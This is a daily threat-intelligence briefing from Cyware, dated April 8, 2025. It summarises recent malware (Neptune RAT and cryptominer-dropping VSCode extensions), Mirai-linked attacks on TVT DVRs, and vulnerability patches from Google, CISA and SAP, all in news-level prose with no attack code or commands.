Cyware Daily Threat Intelligence, April 08, 2025
Daily Threat Briefing • April 8, 2025
What looked like useful dev tools were actually mining rigs in disguise. Several malicious extensions on the VSCode Marketplace were found silently installing XMRig miner. Over 300,000 installs flew under the radar before discovery.
A wave of Mirai-linked scanning is hitting video surveillance systems. GreyNoise has tracked a spike in exploitation attempts targeting TVT NVMS9000 DVRs, with over 2,500 IPs launching attacks. The flaw could grant attackers admin access to DVRs.
Two USB-related vulnerabilities in the Linux kernel have been weaponized in real-world attacks. Google patched them, both tied to information disclosure and privilege escalation. The latter was previously used in a targeted Android exploit late last year. All known active exploitation paths have now been patched in the latest round of 62 fixes.
Top Malware Reported in the Last 24 Hours
New Neptune RAT spreads via YouTube
A latest version of Neptune RAT has been discovered, which uses advanced anti-analysis techniques and persistence methods to maintain its presence on the victim’s system. It comes packed with malicious features, including a crypto clipper, password stealer that exfiltrate credentials from 270+ unique apps, ransomware capabilities, and live desktop monitoring. Neptune RAT uses a technique involving PowerShell commands, irm (Invoke-RestMethod) and iex (Invoke-Expression), to download and execute a batch script and malware payload, establishing a connection between the client and the attacker’s server. The malware has been proliferating across GitHub, Telegram, and YouTube and targeting Windows users.
Malicious VSCode extensions drop malware
Nine malicious extensions were discovered on Microsoft's Visual Studio Code Marketplace, posing as legitimate development tools. These extensions, which have amassed over 300,000 installs since April 4, secretly install the XMRig cryptominer to mine Ethereum and Monero. The extensions include Discord Rich Presence for VS Code and Rojo – Roblox Studio Sync, among others. When installed, they fetch a PowerShell script from an external source, which then disables defenses, establishes persistence, escalates privileges, and loads the cryptominer.
Surge in exploitation attempts against TVT DVRs
GreyNoise Intelligence has detected a significant increase in exploitation attempts against TVT NVMS9000 DVRs, primarily used in security and surveillance systems. The activity, which peaked on April 3 with over 2,500 unique IPs, is associated with the Mirai botnet. The vulnerability could potentially allow attackers to gain administrative control over affected systems. Most malicious IP addresses are targeting systems in the U.S., the U.K, and Germany, with the majority originating from Asia-Pacific. GreyNoise recommends organizations using the NVMS9000 DVR to block known malicious IP addresses, apply available patches, restrict public internet access to DVR interfaces, and monitor network traffic for signs of unusual activity.
Top Vulnerabilities Reported in the Last 24 Hours
Google issues Android update
Google released patches for 62 vulnerabilities, two of which have been exploited in real-world attacks. These two high-severity vulnerabilities, CVE-2024-53150 and CVE-2024-53197, are both in the USB sub-component of the Kernel and could lead to information disclosure and privilege escalation, respectively. Google acknowledged that these vulnerabilities may have been exploited in limited, targeted attacks. Notably, CVE-2024-53197, along with two other vulnerabilities, was used to break into an Android phone in December 2024. Google has now patched all three vulnerabilities.
CISA adds CrushFTP bug to KEV catalog
A critical security vulnerability in CrushFTP software has been added to the CISA’s KEV catalog due to active exploitation in the wild. The flaw, an authentication bypass issue, could allow unauthenticated attackers to take over vulnerable instances and has been fixed in versions 10.8.4 and 11.3.1. Huntress has observed in-the-wild exploitation of the vulnerability, with attackers using MeshCentral agent and other malware for post-exploitation activities. The threat actors have targeted various sectors, including marketing, retail, and semiconductors, and have installed remote desktop software, harvested credentials, and added a non-admin user to the local administrators group.
SAP April 2025 Patch Day
SAP released a series of critical security updates during its Security Patch Day. The updates included 18 new Security Notes and 2 updates to previously released notes. Among the most critical fixes were code injection vulnerabilities in SAP S/4HANA (CVE-2025-27429) and SAP Landscape Transformation (CVE-2025-31330), both posing significant threats to system security. An authentication bypass flaw in SAP Financial Consolidation was also addressed. Other updates included fixes for high, medium, and low-priority vulnerabilities across various SAP products.